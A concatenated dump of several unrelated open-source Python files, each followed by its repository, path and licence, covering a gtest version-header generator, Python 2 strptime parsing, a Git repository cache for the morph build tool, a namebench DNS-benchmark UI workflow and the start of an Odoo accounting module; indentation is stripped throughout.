uses it to generate a header file containing the same information. The
#defines in this header file will be included in during the generation of
the Info.plist of the framework, giving the correct value to the version
shown in the Finder.
This script makes the following assumptions (these are faults of the script,
not problems with the Autoconf):
1. The AC_INIT macro will be contained within the first 1024 characters
of configure.ac
2. The version string will be 3 integers separated by periods and will be
surrounded by squre brackets, "[" and "]" (e.g. [1.0.1]). The first
segment represents the major version, the second represents the minor
version and the third represents the fix version.
3. No ")" character exists between the opening "(" and closing ")" of
AC_INIT, including in comments and character strings.
"""
import sys
import re
# Read the command line argument (the output directory for Version.h)
if (len(sys.argv) < 3):
print "Usage: versiongenerate.py input_dir output_dir"
sys.exit(1)
else:
input_dir = sys.argv[1]
output_dir = sys.argv[2]
# Read the first 1024 characters of the configure.ac file
config_file = open("%s/configure.ac" % input_dir, 'r')
buffer_size = 1024
opening_string = config_file.read(buffer_size)
config_file.close()
# Extract the version string from the AC_INIT macro
# The following init_expression means:
# Extract three integers separated by periods and surrounded by squre
# brackets(e.g. "[1.0.1]") between "AC_INIT(" and ")". Do not be greedy
# (*? is the non-greedy flag) since that would pull in everything between
# the first "(" and the last ")" in the file.
version_expression = re.compile(r"AC_INIT\(.*?\[(\d+)\.(\d+)\.(\d+)\].*?\)",
re.DOTALL)
version_values = version_expression.search(opening_string)
major_version = version_values.group(1)
minor_version = version_values.group(2)
fix_version = version_values.group(3)
# Write the version information to a header file to be included in the
# Info.plist file.
file_data = """//
// DO NOT MODIFY THIS FILE (but you can delete it)
//
// This file is autogenerated by the versiongenerate.py script. This script
// is executed in a "Run Script" build phase when creating gtest.framework. This
// header file is not used during compilation of C-source. Rather, it simply
// defines some version strings for substitution in the Info.plist. Because of
// this, we are not not restricted to C-syntax nor are we using include guards.
//
#define GTEST_VERSIONINFO_SHORT %s.%s
#define GTEST_VERSIONINFO_LONG %s.%s.%s
""" % (major_version, minor_version, major_version, minor_version, fix_version)
version_file = open("%s/Version.h" % output_dir, 'w')
version_file.write(file_data)
version_file.close()
| bsd-3-clause |
magicrub/MissionPlanner | Lib/_strptime.py | 61 | 20208 | """Strptime-related classes and functions.
CLASSES:
LocaleTime -- Discovers and stores locale-specific time information
TimeRE -- Creates regexes for pattern matching a string of text containing
time information
FUNCTIONS:
_getlang -- Figure out what language is being used for the locale
strptime -- Calculates the time struct represented by the passed-in string
"""
import time
import locale
import calendar
from re import compile as re_compile
from re import IGNORECASE
from re import escape as re_escape
from datetime import date as datetime_date
try:
from thread import allocate_lock as _thread_allocate_lock
except:
from dummy_thread import allocate_lock as _thread_allocate_lock
__all__ = []
def _getlang():
# Figure out what the current language is set to.
return locale.getlocale(locale.LC_TIME)
class LocaleTime(object):
"""Stores and handles locale-specific information related to time.
ATTRIBUTES:
f_weekday -- full weekday names (7-item list)
a_weekday -- abbreviated weekday names (7-item list)
f_month -- full month names (13-item list; dummy value in [0], which
is added by code)
a_month -- abbreviated month names (13-item list, dummy value in
[0], which is added by code)
am_pm -- AM/PM representation (2-item list)
LC_date_time -- format string for date/time representation (string)
LC_date -- format string for date representation (string)
LC_time -- format string for time representation (string)
timezone -- daylight- and non-daylight-savings timezone representation
(2-item list of sets)
lang -- Language used by instance (2-item tuple)
"""
def __init__(self):
"""Set all attributes.
Order of methods called matters for dependency reasons.
The locale language is set at the offset and then checked again before
exiting. This is to make sure that the attributes were not set with a
mix of information from more than one locale. This would most likely
happen when using threads where one thread calls a locale-dependent
function while another thread changes the locale while the function in
the other thread is still running. Proper coding would call for
locks to prevent changing the locale while locale-dependent code is
running. The check here is done in case someone does not think about
doing this.
Only other possible issue is if someone changed the timezone and did
not call tz.tzset . That is an issue for the programmer, though,
since changing the timezone is worthless without that call.
"""
self.lang = _getlang()
self.__calc_weekday()
self.__calc_month()
self.__calc_am_pm()
self.__calc_timezone()
self.__calc_date_time()
if _getlang() != self.lang:
raise ValueError("locale changed during initialization")
def __pad(self, seq, front):
# Add '' to seq to either the front (is True), else the back.
seq = list(seq)
if front:
seq.insert(0, '')
else:
seq.append('')
return seq
def __calc_weekday(self):
# Set self.a_weekday and self.f_weekday using the calendar
# module.
a_weekday = [calendar.day_abbr[i].lower() for i in range(7)]
f_weekday = [calendar.day_name[i].lower() for i in range(7)]
self.a_weekday = a_weekday
self.f_weekday = f_weekday
def __calc_month(self):
# Set self.f_month and self.a_month using the calendar module.
a_month = [calendar.month_abbr[i].lower() for i in range(13)]
f_month = [calendar.month_name[i].lower() for i in range(13)]
self.a_month = a_month
self.f_month = f_month
def __calc_am_pm(self):
# Set self.am_pm by using time.strftime().
# The magic date (1999,3,17,hour,44,55,2,76,0) is not really that
# magical; just happened to have used it everywhere else where a
# static date was needed.
am_pm = []
for hour in (01,22):
time_tuple = time.struct_time((1999,3,17,hour,44,55,2,76,0))
am_pm.append(time.strftime("%p", time_tuple).lower())
self.am_pm = am_pm
def __calc_date_time(self):
# Set self.date_time, self.date, & self.time by using
# time.strftime().
# Use (1999,3,17,22,44,55,2,76,0) for magic date because the amount of
# overloaded numbers is minimized. The order in which searches for
# values within the format string is very important; it eliminates
# possible ambiguity for what something represents.
time_tuple = time.struct_time((1999,3,17,22,44,55,2,76,0))
date_time = [None, None, None]
date_time[0] = time.strftime("%c", time_tuple).lower()
date_time[1] = time.strftime("%x", time_tuple).lower()
date_time[2] = time.strftime("%X", time_tuple).lower()
replacement_pairs = [('%', '%%'), (self.f_weekday[2], '%A'),
(self.f_month[3], '%B'), (self.a_weekday[2], '%a'),
(self.a_month[3], '%b'), (self.am_pm[1], '%p'),
('1999', '%Y'), ('99', '%y'), ('22', '%H'),
('44', '%M'), ('55', '%S'), ('76', '%j'),
('17', '%d'), ('03', '%m'), ('3', '%m'),
# '3' needed for when no leading zero.
('2', '%w'), ('10', '%I')]
replacement_pairs.extend([(tz, "%Z") for tz_values in self.timezone
for tz in tz_values])
for offset,directive in ((0,'%c'), (1,'%x'), (2,'%X')):
current_format = date_time[offset]
for old, new in replacement_pairs:
# Must deal with possible lack of locale info
# manifesting itself as the empty string (e.g., Swedish's
# lack of AM/PM info) or a platform returning a tuple of empty
# strings (e.g., MacOS 9 having timezone as ('','')).
if old:
current_format = current_format.replace(old, new)
# If %W is used, then Sunday, 2005-01-03 will fall on week 0 since
# 2005-01-03 occurs before the first Monday of the year. Otherwise
# %U is used.
time_tuple = time.struct_time((1999,1,3,1,1,1,6,3,0))
if '00' in time.strftime(directive, time_tuple):
U_W = '%W'
else:
U_W = '%U'
date_time[offset] = current_format.replace('11', U_W)
self.LC_date_time = date_time[0]
self.LC_date = date_time[1]
self.LC_time = date_time[2]
def __calc_timezone(self):
# Set self.timezone by using time.tzname.
# Do not worry about possibility of time.tzname[0] == timetzname[1]
# and time.daylight; handle that in strptime .
try:
time.tzset()
except AttributeError:
pass
no_saving = frozenset(["utc", "gmt", time.tzname[0].lower()])
if time.daylight:
has_saving = frozenset([time.tzname[1].lower()])
else:
has_saving = frozenset()
self.timezone = (no_saving, has_saving)
class TimeRE(dict):
"""Handle conversion from format directives to regexes."""
def __init__(self, locale_time=None):
"""Create keys/values.
Order of execution is important for dependency reasons.
"""
if locale_time:
self.locale_time = locale_time
else:
self.locale_time = LocaleTime()
base = super(TimeRE, self)
base.__init__({
# The " \d" part of the regex is to make %c from ANSI C work
'd': r"(?P<d>3[0-1]|[1-2]\d|0[1-9]|[1-9]| [1-9])",
'f': r"(?P<f>[0-9]{1,6})",
'H': r"(?P<H>2[0-3]|[0-1]\d|\d)",
'I': r"(?P<I>1[0-2]|0[1-9]|[1-9])",
'j': r"(?P<j>36[0-6]|3[0-5]\d|[1-2]\d\d|0[1-9]\d|00[1-9]|[1-9]\d|0[1-9]|[1-9])",
'm': r"(?P<m>1[0-2]|0[1-9]|[1-9])",
'M': r"(?P<M>[0-5]\d|\d)",
'S': r"(?P<S>6[0-1]|[0-5]\d|\d)",
'U': r"(?P<U>5[0-3]|[0-4]\d|\d)",
'w': r"(?P<w>[0-6])",
# W is set below by using 'U'
'y': r"(?P<y>\d\d)",
#XXX: Does 'Y' need to worry about having less or more than
# 4 digits?
'Y': r"(?P<Y>\d\d\d\d)",
'A': self.__seqToRE(self.locale_time.f_weekday, 'A'),
'a': self.__seqToRE(self.locale_time.a_weekday, 'a'),
'B': self.__seqToRE(self.locale_time.f_month[1:], 'B'),
'b': self.__seqToRE(self.locale_time.a_month[1:], 'b'),
'p': self.__seqToRE(self.locale_time.am_pm, 'p'),
'Z': self.__seqToRE((tz for tz_names in self.locale_time.timezone
for tz in tz_names),
'Z'),
'%': '%'})
base.__setitem__('W', base.__getitem__('U').replace('U', 'W'))
base.__setitem__('c', self.pattern(self.locale_time.LC_date_time))
base.__setitem__('x', self.pattern(self.locale_time.LC_date))
base.__setitem__('X', self.pattern(self.locale_time.LC_time))
def __seqToRE(self, to_convert, directive):
"""Convert a list to a regex string for matching a directive.
Want possible matching values to be from longest to shortest. This
prevents the possibility of a match occuring for a value that also
a substring of a larger value that should have matched (e.g., 'abc'
matching when 'abcdef' should have been the match).
"""
to_convert = sorted(to_convert, key=len, reverse=True)
for value in to_convert:
if value != '':
break
else:
return ''
regex = '|'.join(re_escape(stuff) for stuff in to_convert)
regex = '(?P<%s>%s' % (directive, regex)
return '%s)' % regex
def pattern(self, format):
"""Return regex pattern for the format string.
Need to make sure that any characters that might be interpreted as
regex syntax are escaped.
"""
processed_format = ''
# The sub() call escapes all characters that might be misconstrued
# as regex syntax. Cannot use re.escape since we have to deal with
# format directives (%m, etc.).
regex_chars = re_compile(r"([\\.^$*+?\(\){}\[\]|])")
format = regex_chars.sub(r"\\\1", format)
whitespace_replacement = re_compile('\s+')
format = whitespace_replacement.sub('\s+', format)
while '%' in format:
directive_index = format.index('%')+1
processed_format = "%s%s%s" % (processed_format,
format[:directive_index-1],
self[format[directive_index]])
format = format[directive_index+1:]
return "%s%s" % (processed_format, format)
def compile(self, format):
"""Return a compiled re object for the format string."""
return re_compile(self.pattern(format), IGNORECASE)
_cache_lock = _thread_allocate_lock()
# DO NOT modify _TimeRE_cache or _regex_cache without acquiring the cache lock
# first!
_TimeRE_cache = TimeRE()
_CACHE_MAX_SIZE = 5 # Max number of regexes stored in _regex_cache
_regex_cache = {}
def _calc_julian_from_U_or_W(year, week_of_year, day_of_week, week_starts_Mon):
"""Calculate the Julian day based on the year, week of the year, and day of
the week, with week_start_day representing whether the week of the year
assumes the week starts on Sunday or Monday (6 or 0)."""
first_weekday = datetime_date(year, 1, 1).weekday()
# If we are dealing with the %U directive (week starts on Sunday), it's
# easier to just shift the view to Sunday being the first day of the
# week.
if not week_starts_Mon:
first_weekday = (first_weekday + 1) % 7
day_of_week = (day_of_week + 1) % 7
# Need to watch out for a week 0 (when the first day of the year is not
# the same as that specified by %U or %W).
week_0_length = (7 - first_weekday) % 7
if week_of_year == 0:
return 1 + day_of_week - first_weekday
else:
days_to_week = week_0_length + (7 * (week_of_year - 1))
return 1 + days_to_week + day_of_week
def _strptime(data_string, format="%a %b %d %H:%M:%S %Y"):
"""Return a time struct based on the input string and the format string."""
global _TimeRE_cache, _regex_cache
with _cache_lock:
if _getlang() != _TimeRE_cache.locale_time.lang:
_TimeRE_cache = TimeRE()
_regex_cache.clear()
if len(_regex_cache) > _CACHE_MAX_SIZE:
_regex_cache.clear()
locale_time = _TimeRE_cache.locale_time
format_regex = _regex_cache.get(format)
if not format_regex:
try:
format_regex = _TimeRE_cache.compile(format)
# KeyError raised when a bad format is found; can be specified as
# \\, in which case it was a stray % but with a space after it
except KeyError, err:
bad_directive = err.args[0]
if bad_directive == "\\":
bad_directive = "%"
del err
raise ValueError("'%s' is a bad directive in format '%s'" %
(bad_directive, format))
# IndexError only occurs when the format string is "%"
except IndexError:
raise ValueError("stray %% in format '%s'" % format)
_regex_cache[format] = format_regex
found = format_regex.match(data_string)
if not found:
raise ValueError("time data %r does not match format %r" %
(data_string, format))
if len(data_string) != found.end():
raise ValueError("unconverted data remains: %s" %
data_string[found.end():])
year = 1900
month = day = 1
hour = minute = second = fraction = 0
tz = -1
# Default to -1 to signify that values not known; not critical to have,
# though
week_of_year = -1
week_of_year_start = -1
# weekday and julian defaulted to -1 so as to signal need to calculate
# values
weekday = julian = -1
found_dict = found.groupdict()
for group_key in found_dict.iterkeys():
# Directives not explicitly handled below:
# c, x, X
# handled by making out of other directives
# U, W
# worthless without day of the week
if group_key == 'y':
year = int(found_dict['y'])
# Open Group specification for strptime() states that a %y
#value in the range of [00, 68] is in the century 2000, while
#[69,99] is in the century 1900
if year <= 68:
year += 2000
else:
year += 1900
elif group_key == 'Y':
year = int(found_dict['Y'])
elif group_key == 'm':
month = int(found_dict['m'])
elif group_key == 'B':
month = locale_time.f_month.index(found_dict['B'].lower())
elif group_key == 'b':
month = locale_time.a_month.index(found_dict['b'].lower())
elif group_key == 'd':
day = int(found_dict['d'])
elif group_key == 'H':
hour = int(found_dict['H'])
elif group_key == 'I':
hour = int(found_dict['I'])
ampm = found_dict.get('p', '').lower()
# If there was no AM/PM indicator, we'll treat this like AM
if ampm in ('', locale_time.am_pm[0]):
# We're in AM so the hour is correct unless we're
# looking at 12 midnight.
# 12 midnight == 12 AM == hour 0
if hour == 12:
hour = 0
elif ampm == locale_time.am_pm[1]:
# We're in PM so we need to add 12 to the hour unless
# we're looking at 12 noon.
# 12 noon == 12 PM == hour 12
if hour != 12:
hour += 12
elif group_key == 'M':
minute = int(found_dict['M'])
elif group_key == 'S':
second = int(found_dict['S'])
elif group_key == 'f':
s = found_dict['f']
# Pad to always return microseconds.
s += "0" * (6 - len(s))
fraction = int(s)
elif group_key == 'A':
weekday = locale_time.f_weekday.index(found_dict['A'].lower())
elif group_key == 'a':
weekday = locale_time.a_weekday.index(found_dict['a'].lower())
elif group_key == 'w':
weekday = int(found_dict['w'])
if weekday == 0:
weekday = 6
else:
weekday -= 1
elif group_key == 'j':
julian = int(found_dict['j'])
elif group_key in ('U', 'W'):
week_of_year = int(found_dict[group_key])
if group_key == 'U':
# U starts week on Sunday.
week_of_year_start = 6
else:
# W starts week on Monday.
week_of_year_start = 0
elif group_key == 'Z':
# Since -1 is default value only need to worry about setting tz if
# it can be something other than -1.
found_zone = found_dict['Z'].lower()
for value, tz_values in enumerate(locale_time.timezone):
if found_zone in tz_values:
# Deal with bad locale setup where timezone names are the
# same and yet time.daylight is true; too ambiguous to
# be able to tell what timezone has daylight savings
if (time.tzname[0] == time.tzname[1] and
time.daylight and found_zone not in ("utc", "gmt")):
break
else:
tz = value
break
# If we know the week of the year and what day of that week, we can figure
# out the Julian day of the year.
if julian == -1 and week_of_year != -1 and weekday != -1:
week_starts_Mon = True if week_of_year_start == 0 else False
julian = _calc_julian_from_U_or_W(year, week_of_year, weekday,
week_starts_Mon)
# Cannot pre-calculate datetime_date() since can change in Julian
# calculation and thus could have different value for the day of the week
# calculation.
if julian == -1:
# Need to add 1 to result since first day of the year is 1, not 0.
julian = datetime_date(year, month, day).toordinal() - \
datetime_date(year, 1, 1).toordinal() + 1
else: # Assume that if they bothered to include Julian day it will
# be accurate.
datetime_result = datetime_date.fromordinal((julian - 1) + datetime_date(year, 1, 1).toordinal())
year = datetime_result.year
month = datetime_result.month
day = datetime_result.day
if weekday == -1:
weekday = datetime_date(year, month, day).weekday()
return (time.struct_time((year, month, day,
hour, minute, second,
weekday, julian, tz)), fraction)
def _strptime_time(data_string, format="%a %b %d %H:%M:%S %Y"):
return _strptime(data_string, format)[0]
| gpl-3.0 |
nuxeh/morph | morphlib/cachedrepo.py | 1 | 9251 | # Copyright (C) 2012-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
import cliapp
import os
import tempfile
import morphlib
class CheckoutDirectoryExistsError(cliapp.AppException):
def __init__(self, repo, target_dir):
cliapp.AppException.__init__(
self,
'Checkout directory %s for repo %s already exists' %
(target_dir, repo))
class CloneError(cliapp.AppException):
def __init__(self, repo, target_dir):
cliapp.AppException.__init__(
self,
'Failed to clone %s into %s' % (repo.original_name, target_dir))
class CopyError(cliapp.AppException):
def __init__(self, repo, target_dir):
cliapp.AppException.__init__(
self,
'Failed to copy %s into %s' % (repo.original_name, target_dir))
class CheckoutError(cliapp.AppException):
def __init__(self, repo, ref, target_dir):
cliapp.AppException.__init__(
self,
'Failed to check out ref %s in %s' % (ref, target_dir))
class UpdateError(cliapp.AppException):
def __init__(self, repo):
cliapp.AppException.__init__(
self, 'Failed to update cached version of repo %s' % repo)
class CachedRepo(object):
'''A locally cached Git repository with an origin remote set up.
On instance of this class represents a locally cached version of a
remote Git repository. This remote repository is set up as the
'origin' remote.
Cached repositories are bare mirrors of the upstream. Locally created
branches will be lost the next time the repository updates.
CachedRepo objects can resolve Git refs into SHA1s. Given a SHA1
ref, they can also be asked to return the contents of a file via the
cat() method. They can furthermore check out the repository into
a local directory using a SHA1 ref. Last but not least, any cached
repo may be updated from it's origin remote using the update()
method.
'''
def __init__(self, app, original_name, url, path):
'''Creates a new CachedRepo for a repo name, URL and local path.'''
self.app = app
self.original_name = original_name
self.url = url
self.path = path
self.is_mirror = not url.startswith('file://')
self.already_updated = False
self._gitdir = morphlib.gitdir.GitDirectory(path)
def ref_exists(self, ref): # pragma: no cover
'''Returns True if the given ref exists in the repo'''
return self._gitdir.ref_exists(ref)
def resolve_ref_to_commit(self, ref): # pragma: no cover
'''Resolve a named ref to a commit SHA1.
Raises gitdir.InvalidRefError if the ref does not exist.
'''
return self._gitdir.resolve_ref_to_commit(ref)
def resolve_ref_to_tree(self, ref): # pragma: no cover
'''Resolve a named ref to a tree SHA1.
Raises gitdir.InvalidRefError if the ref does not exist.
'''
return self._gitdir.resolve_ref_to_tree(ref)
def read_file(self, filename, ref): # pragma: no cover
'''Attempts to read a file from a given ref.
Raises a gitdir.InvalidRefError if the ref is not found in the
repository. Raises an IOError if the requested file is not found in
the ref.
'''
return self._gitdir.read_file(filename, ref)
def list_files(self, ref, recurse=True): # pragma: no cover
'''Return filenames found in the tree pointed to by the given ref.
Returns a gitdir.InvalidRefError if the ref is not found in the
repository.
'''
return self._gitdir.list_files(ref, recurse)
def clone_checkout(self, ref, target_dir):
'''Clone from the cache into the target path and check out a given ref.
Raises a CheckoutDirectoryExistsError if the target
directory already exists. Raises a gitdir.InvalidRefError if the
ref is not found in the repository. Raises a CheckoutError if
something else goes wrong while copying the repository or checking
out the SHA1 ref.
'''
if os.path.exists(target_dir):
raise CheckoutDirectoryExistsError(self, target_dir)
self._gitdir.resolve_ref_to_commit(ref)
self._clone_into(target_dir, ref)
def checkout(self, ref, target_dir):
'''Unpacks the repository in a directory and checks out a commit ref.
Raises an gitdir.InvalidRefError if the ref is not found in the
repository. Raises a CopyError if something goes wrong with the copy
of the repository. Raises a CheckoutError if something else goes wrong
while copying the repository or checking out the SHA1 ref.
'''
if not os.path.exists(target_dir):
os.mkdir(target_dir)
# Note, we copy instead of cloning because it's much faster in the case
# that the target is on a different filesystem from the cache. We then
# take care to turn the copy into something as good as a real clone.
self._copy_repository(self.path, target_dir)
self._checkout_ref_in_clone(ref, target_dir)
def extract_commit(self, ref, target_dir):
'''Extract files from a given commit into target_dir.
This is different to a 'checkout': a checkout assumes a working tree
associated with a repository. Here, the repository is immutable (it's
in the cache) and we just want to look at the files in a quick way
(quicker than going 'git cat-file everything').
This seems marginally quicker than doing a shallow clone. Running
`morph list-artifacts` 10 times gave an average time of 1.334s
using `git clone --depth 1` and an average time of 1.261s using
this code.
'''
if not os.path.exists(target_dir):
os.makedirs(target_dir)
with tempfile.NamedTemporaryFile() as index_file:
index = self._gitdir.get_index(index_file=index_file.name)
index.set_to_tree(ref)
index.checkout(working_tree=target_dir)
def requires_update_for_ref(self, ref):
'''Returns False if there's no need to update this cached repo.
If the ref points to a specific commit that's already available
locally, there's never any need to update. If it's a named ref and this
repo wasn't already updated in the lifetime of the current process,
it's necessary to update.
'''
if not self.is_mirror:
# Repos with file:/// URLs don't ever need updating.
return False
if self.already_updated:
return False
# Named refs that are valid SHA1s will confuse this code.
ref_can_change = not morphlib.git.is_valid_sha1(ref)
if ref_can_change or not self._gitdir.ref_exists(ref):
return True
else:
return False
def update(self):
'''Updates the cached repository using its origin remote.
Raises an UpdateError if anything goes wrong while performing
the update.
'''
if not self.is_mirror:
return
try:
self._gitdir.update_remotes(
echo_stderr=self.app.settings['verbose'])
self.already_updated = True
except cliapp.AppException:
raise UpdateError(self)
def _runcmd(self, *args, **kwargs): # pragma: no cover
if not 'cwd' in kwargs:
kwargs['cwd'] = self.path
return self.app.runcmd(*args, **kwargs)
def _clone_into(self, target_dir, ref): # pragma: no cover
'''Actually perform the clone'''
try:
morphlib.git.clone_into(self._runcmd, self.path, target_dir,
ref)
except cliapp.AppException:
raise CloneError(self, target_dir)
def _copy_repository(self, source_dir, target_dir): # pragma: no cover
try:
morphlib.git.copy_repository(
self._runcmd, source_dir, target_dir, self.is_mirror)
except cliapp.AppException:
raise CopyError(self, target_dir)
def _checkout_ref_in_clone(self, ref, clone_dir): # pragma: no cover
# This is a separate GitDirectory instance. Don't confuse it with the
# internal ._gitdir attribute!
working_gitdir = morphlib.gitdir.GitDirectory(clone_dir)
try:
working_gitdir.checkout(ref)
except cliapp.AppException as e:
raise CheckoutError(self, ref, clone_dir)
return working_gitdir
def __str__(self): # pragma: no cover
return self.url
| gpl-2.0 |
dimazalfrianz/namebench | libnamebench/base_ui.py | 172 | 10284 | # Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A base user-interface workflow, to be inherited by UI modules."""
import tempfile
import addr_util
import benchmark
import better_webbrowser
import config
import data_sources
import geoip
import nameserver
import reporter
import providers
import site_connector
import util
__author__ = 'tstromberg@google.com (Thomas Stromberg)'
class BaseUI(object):
"""Common methods for all UI implementations."""
def __init__(self):
self.SetupDataStructures()
def SetupDataStructures(self):
"""Instead of requiring users to inherit __init__(), this sets up structures."""
self.reporter = None
self.nameservers = None
self.bmark = None
self.report_path = None
self.csv_path = None
self.geodata = None
self.sources = {}
self.url = None
self.share_state = None
self.test_records = []
def UpdateStatus(self, msg, **kwargs):
"""Update the little status message on the bottom of the window."""
if hasattr(self, 'status_callback') and self.status_callback:
self.status_callback(msg, **kwargs)
else:
print msg
def DebugMsg(self, message):
self.UpdateStatus(message, debug=True)
def LoadDataSources(self):
self.data_src = data_sources.DataSources(status_callback=self.UpdateStatus)
def PrepareTestRecords(self):
"""Figure out what data source a user wants, and create test_records."""
if self.options.input_source:
src_type = self.options.input_source
else:
src_type = self.data_src.GetBestSourceDetails()[0]
self.options.input_source = src_type
self.test_records = self.data_src.GetTestsFromSource(
src_type,
self.options.query_count,
select_mode=self.options.select_mode
)
def GatherNameServerData(self):
"""Build a nameserver data set from config and other sources."""
ns_data = config.GetNameServerData()
for i, ip in enumerate(self.options.servers):
ns = nameserver.NameServer(ip, tags=['specified'], name='USR%s-%s' % (i, ip))
ns_data.append(ns)
return ns_data
def GetExternalNetworkData(self):
"""Return a domain and ASN for myself."""
asn = None
domain = None
client_ip = providers.GetExternalIp()
if client_ip:
# self.UpdateStatus("Detected external IP as %s" % client_ip)
local_ns = providers.SystemResolver()
hostname = local_ns.GetReverseIp(client_ip)
if hostname != client_ip:
domain = addr_util.GetDomainFromHostname(hostname)
else:
domain = None
asn = local_ns.GetAsnForIp(client_ip)
return (domain, asn)
def PrepareNameServers(self):
"""Setup self.nameservers to have a list of healthy fast servers."""
self.nameservers = self.GatherNameServerData()
self.nameservers.max_servers_to_check = self.options.max_servers_to_check
self.nameservers.thread_count = self.options.health_thread_count
require_tags = set()
include_tags = self.options.tags
country_code = None
if self.options.ipv6_only:
require_tags.add('ipv6')
elif self.options.ipv4_only:
require_tags.add('ipv4')
if self.options.tags.intersection(set(['nearby', 'country', 'likely-isp', 'nearby'])):
country_code, country_name, lat, lon = self.ConfiguredLocationData()
if country_code:
self.nameservers.SetClientLocation(lat, lon, country_code)
if self.options.tags.intersection(set(['isp','network'])):
domain, asn = self.GetExternalNetworkData()
if asn:
self.nameservers.SetNetworkLocation(domain, asn)
self.UpdateStatus("Looking for nameservers within %s or AS%s" % (domain, asn))
self.nameservers.AddNetworkTags()
if 'country' in self.options.tags:
include_tags.discard('country')
include_tags.add('country_%s' % country_code.lower())
if 'nearby' in self.options.tags and lat:
distance = self.options.distance
if 'country' in self.options.tags:
if self.nameservers.HasEnoughInCountryServers() and self.options.distance > self.options.overload_distance:
self.UpdateStatus("Looks like we already have >%s in-country servers, shortening nearby distance." % self.options.max_servers_to_check)
distance = self.options.overload_distance
self.UpdateStatus("Adding locality flags for servers within %skm of %s,%s" % (distance, lat, lon))
self.nameservers.AddLocalityTags(max_distance=distance)
self.nameservers.status_callback = self.UpdateStatus
self.UpdateStatus("DNS server filter: %s %s" % (','.join(include_tags),
','.join(require_tags)))
self.nameservers.FilterByTag(include_tags=include_tags,
require_tags=require_tags)
def ConfiguredLocationData(self):
self.DiscoverLocation()
if self.options.country:
country_code, country_name, lat, lon = geoip.GetInfoForCountry(self.options.country)
self.UpdateStatus("Set country to %s - %s (%s,%s)" % (country_code, country_name, lat, lon))
else:
country_code = self.geodata.get('country_code')
if not country_code:
return None, None, None, None
country_code, country_name = geoip.GetInfoForCountry(country_code)[0:2]
region = self.geodata.get('region_name')
lat = self.geodata.get('latitude')
lon = self.geodata.get('longitude')
self.UpdateStatus("Determined location as %s: %s, %s (%s,%s)" % (country_code, region, country_name, lat, lon))
return country_code, country_name, lat, lon
def CheckNameServerHealth(self):
self.nameservers.SetTimeouts(self.options.timeout,
self.options.ping_timeout,
self.options.health_timeout)
self.nameservers.CheckHealth(sanity_checks=config.GetSanityChecks())
def PrepareBenchmark(self):
"""Setup the benchmark object with the appropriate dataset."""
if len(self.nameservers) == 1:
thread_count = 1
else:
thread_count = self.options.benchmark_thread_count
self.bmark = benchmark.Benchmark(self.nameservers,
query_count=self.options.query_count,
run_count=self.options.run_count,
thread_count=thread_count,
status_callback=self.UpdateStatus)
def RunBenchmark(self):
"""Run the benchmark."""
results = self.bmark.Run(self.test_records)
self.UpdateStatus("Benchmark finished.")
index = []
if self.options.upload_results in (1, True):
connector = site_connector.SiteConnector(self.options, status_callback=self.UpdateStatus)
index_hosts = connector.GetIndexHosts()
if index_hosts:
index = self.bmark.RunIndex(index_hosts)
else:
index = []
self.DiscoverLocation()
self.reporter = reporter.ReportGenerator(self.options, self.nameservers,
results, index=index, geodata=self.geodata)
def DiscoverLocation(self):
if not getattr(self, 'geodata', None):
self.UpdateStatus("Determining your location...")
self.geodata = geoip.GetGeoData()
# Try again
if not self.geodata:
self.UpdateStatus("Determining your location (retry)...")
self.geodata = geoip.GetGeoData()
return self.geodata
def RunAndOpenReports(self):
"""Run the benchmark and open up the report on completion."""
self.RunBenchmark()
best = self.reporter.BestOverallNameServer()
self.CreateReports()
if self.options.template == 'html':
self.DisplayHtmlReport()
if self.url:
self.UpdateStatus('Complete! Your results: %s' % self.url)
else:
self.UpdateStatus('Complete! %s [%s] is the best.' % (best.name, best.ip))
def CreateReports(self):
"""Create CSV & HTML reports for the latest run."""
if self.options.output_file:
self.report_path = self.options.output_file
else:
self.report_path = util.GenerateOutputFilename(self.options.template)
if self.options.csv_file:
self.csv_path = self.options_csv_file
else:
self.csv_path = util.GenerateOutputFilename('csv')
if self.options.upload_results in (1, True):
# This is for debugging and transparency only.
self.json_path = util.GenerateOutputFilename('js')
self.UpdateStatus('Saving anonymized JSON to %s' % self.json_path)
json_data = self.reporter.CreateJsonData()
f = open(self.json_path, 'w')
f.write(json_data)
f.close()
self.UpdateStatus('Uploading results to %s' % self.options.site_url)
connector = site_connector.SiteConnector(self.options, status_callback=self.UpdateStatus)
self.url, self.share_state = connector.UploadJsonResults(
json_data,
hide_results=self.options.hide_results
)
if self.url:
self.UpdateStatus('Your sharing URL: %s (%s)' % (self.url, self.share_state))
self.UpdateStatus('Saving report to %s' % self.report_path)
f = open(self.report_path, 'w')
self.reporter.CreateReport(format=self.options.template,
output_fp=f,
csv_path=self.csv_path,
sharing_url=self.url,
sharing_state=self.share_state)
f.close()
self.UpdateStatus('Saving detailed results to %s' % self.csv_path)
self.reporter.SaveResultsToCsv(self.csv_path)
def DisplayHtmlReport(self):
self.UpdateStatus('Opening %s' % self.report_path)
better_webbrowser.output = self.DebugMsg
better_webbrowser.open(self.report_path)
| apache-2.0 |
codekaki/odoo | addons/account/company.py | 56 | 2828 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
